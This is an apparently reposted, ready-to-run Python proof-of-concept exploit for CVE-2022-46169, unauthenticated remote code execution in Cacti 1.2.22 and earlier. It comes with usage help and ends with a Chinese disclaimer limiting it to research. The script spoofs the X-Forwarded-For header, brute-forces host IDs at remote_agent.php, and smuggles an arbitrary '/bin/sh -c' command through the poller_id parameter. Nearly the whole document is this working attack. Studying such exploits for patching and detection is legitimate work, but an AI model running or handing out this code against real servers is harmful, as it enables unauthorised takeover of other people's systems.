positional arguments:
target URL of the Cacti application.
optional arguments:
-f FILE File containing the command
-c CMD Command
--n_host_ids The range of host_ids to try (0 - n)
--n_local_data_ids The range of local_data_ids to try (0 - n)
import requests
import argparse
parser = argparse.ArgumentParser(
prog='Poc for CVE-2022-46169',
description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',
epilog='Author: saspect')
parser.add_argument('target', help='URL of the Cacti application.')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', type=argparse.FileType(),
help='File containing the command', dest='file')
group.add_argument('-c', help='Command', dest='cmd')
parser.add_argument(
'--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int)
parser.add_argument(
'--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int)
args = parser.parse_args()
if args.file:
# The '-f' argument is supplied, read the command from the file
cmd = args.file.read().strip()
elif args.cmd:
# The '-c' argument is supplied, use it as the command
cmd = args.cmd
else:
# No command was supplied, print an error message
parser.print_help()
exit(1)
payload = f'; /bin/sh -c "{cmd}"'
local_data_ids = [x for x in range(0, args.n_localids)]
target_ip = args.target.split("/")[2]
print(f"[*] Trying for 1 - {args.n_ids} host ids")
for id in range(args.n_ids):
url = f'{args.target}/remote_agent.php'
params = {'action': 'polldata', 'host_id': id,
'poller_id': payload, 'local_data_ids[]': local_data_ids}
headers = {'X-Forwarded-For': target_ip}
r = requests.get(url, params=params, headers=headers)
if('cmd.php' in r.text):
print(f"[+] Exploit Completed for host_id = {id}")
break
原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论